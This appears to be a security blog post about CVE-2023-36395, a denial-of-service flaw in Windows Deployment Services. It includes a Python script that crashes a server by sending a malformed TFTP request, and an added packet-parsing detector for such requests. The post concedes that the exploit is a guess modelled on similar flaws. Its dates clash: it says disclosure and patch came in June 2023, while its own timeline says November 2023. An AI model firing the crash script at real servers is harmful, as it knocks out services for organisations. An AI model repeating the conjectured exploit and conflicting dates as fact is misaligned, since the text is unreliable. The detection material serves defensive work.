CVE-2023-36395 is a Denial of Service (DoS) vulnerability found in Windows Deployment Services (WDS). In this post, we’ll break down the vulnerability, walk through the technical details, show you a simplified exploit example, discuss mitigation steps, and provide links to official references.
What is Windows Deployment Services?
Windows Deployment Services (WDS) is a Microsoft technology for network-based installation of Windows operating systems. It's used by sysadmins to deploy Windows builds to multiple computers over a network. WDS runs on Windows Server and typically listens for Preboot eXecution Environment (PXE) requests.
CVE-2023-36395: What’s the Problem?
Microsoft disclosed CVE-2023-36395 in June 2023. The vulnerability allows an unauthenticated attacker to send a specially crafted request to a WDS server, causing the service (wdssrv) to crash or become unresponsive.
Attackers can perform a denial-of-service (DoS) without valid credentials, potentially knocking out OS deployment for an entire organization.
Affected Versions
- Windows Server 2012/R2
How the Vulnerability Works
The root cause is improper handling of malformed requests to the WDS service (specifically the PXE or TFTP endpoint). If the WDS server receives a specially crafted network request, it can trigger an exception and crash or hang the service process.
- No authentication is required.
- The exploit can be performed remotely whenever network access to WDS is possible (usually UDP ports 67, 69, or 4011).
Proof-of-Concept Exploit
Below is a simplified Python script that demonstrates how a malformed TFTP (Trivial File Transfer Protocol) request could crash a vulnerable WDS server.
Warning: _Do not run this script against systems you do not own or have permission to test!_
```python
import socket

# WDS TFTP runs on UDP port 69 by default
WDS_IP = '192.168.1.100'
TFTP_PORT = 69

# Malformed TFTP RRQ (Read Request): an unusually long filename triggers a buffer exception
payload = b'\x00\x01'        # Opcode (Read Request)
payload += b'A' * 500        # Large filename (likely to crash the parser)
payload += b'\x00'           # Filename terminator
payload += b'octet\x00'      # Normal mode string

sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(payload, (WDS_IP, TFTP_PORT))
print("[*] Malformed TFTP RRQ sent to {}:{}".format(WDS_IP, TFTP_PORT))
sock.close()
```
This code abuses the TFTP protocol by sending a Read Request with an absurdly long filename. If the WDS service doesn’t properly handle this situation, it crashes or hangs, resulting in a DoS.
*Note: The actual crash details may depend on the specific vulnerability implementation. Microsoft didn’t publish full specifics, and exploit details in the wild are rare, but this pattern matches similar WDS flaws.*
Detection and Logs
- Check Event Viewer under Applications and Services Logs > Windows Deployment Services for unexpected termination messages.
- Monitor the wdssrv process for crashes or hangs.
- Use tcpdump, Wireshark, or Microsoft Message Analyzer to capture suspicious activity directed at UDP ports 67, 69, or 4011.
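To turn the packet capture advice above into something actionable, here is an added example (not from the original post, and not a Microsoft or WDS tool) that parses the UDP payload of TFTP requests and flags the kind of malformed RRQ the proof of concept sends. The 128-byte filename threshold, the sample packets and the `scan_packets` helper are assumptions constructed for this example; RFC 1350 itself sets no filename limit.

```python
import struct

# Constructed thresholds for this example (assumptions, not from the advisory):
# RFC 1350 sets no filename limit, but PXE boot paths are short, so anything
# longer than this is treated as suspicious.
MAX_SANE_FILENAME = 128
TFTP_MODES = {b"netascii", b"octet", b"mail"}
TFTP_OPCODES = {1: "RRQ", 2: "WRQ", 3: "DATA", 4: "ACK", 5: "ERROR", 6: "OACK"}


def parse_tftp_request(payload: bytes) -> dict:
    """Parse a TFTP packet's UDP payload; 'flags' lists why it looks malformed."""
    info = {"opcode": None, "filename": b"", "mode": b"", "flags": []}
    if len(payload) < 2:
        info["flags"].append("truncated: no opcode")
        return info
    opcode = struct.unpack("!H", payload[:2])[0]
    info["opcode"] = TFTP_OPCODES.get(opcode, "UNKNOWN")
    if opcode not in TFTP_OPCODES:
        info["flags"].append(f"unknown opcode {opcode}")
    if opcode not in (1, 2):          # only RRQ/WRQ carry filename and mode
        return info
    # RRQ/WRQ layout: opcode | filename | NUL | mode | NUL
    fields = payload[2:].split(b"\x00")
    if len(fields) < 3:               # a well-formed split gives [name, mode, b""]
        info["flags"].append("missing NUL terminator")
    info["filename"] = fields[0]
    info["mode"] = fields[1] if len(fields) > 1 else b""
    if len(info["filename"]) > MAX_SANE_FILENAME:
        info["flags"].append(f"oversized filename ({len(info['filename'])} bytes)")
    if info["mode"].lower() not in TFTP_MODES:
        info["flags"].append(f"unexpected mode {info['mode']!r}")
    if any(b < 0x20 or b > 0x7E for b in info["filename"]):
        info["flags"].append("non-printable bytes in filename")
    return info


def scan_packets(packets) -> list:
    """packets: iterable of (src_ip, dst_port, udp_payload) tuples, e.g. pulled
    from a capture. Returns alert strings for malformed TFTP aimed at UDP 69."""
    alerts = []
    for src_ip, dst_port, payload in packets:
        if dst_port != 69:            # 67/4011 are DHCP/PXE and use another format
            continue
        info = parse_tftp_request(payload)
        for reason in info["flags"]:
            alerts.append(f"{src_ip} -> udp/{dst_port} {info['opcode']}: {reason}")
    return alerts
```

Feed it payloads extracted from tcpdump or Wireshark output; a normal PXE boot request (short path, `octet` mode) produces no flags, while the 500-byte RRQ from the proof of concept is reported as oversized.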
Official Patch
Microsoft released a patch in June 2023 for all supported versions. Always apply the latest updates.
Links & References
- Microsoft CVE-2023-36395 Security Advisory
- Windows Deployment Services documentation
- TFTP Protocol RFC 1350
- NIST CVE Details
- Rapid7 Analysis
Summary
CVE-2023-36395 is a critical Windows Deployment Services flaw that lets attackers crash your server with a single, malformed packet—no login required. If your WDS is exposed beyond trusted networks, patch right away or shut down unused services.
If you liked this breakdown, drop a comment or share. Stay safe, patch fast!
*Remember: Responsible security starts with understanding how things break—then fixing them before the bad guys get in.*
Timeline
Published on: 11/14/2023 18:15:38 UTC
Last modified on: 11/20/2023 18:04:48 UTC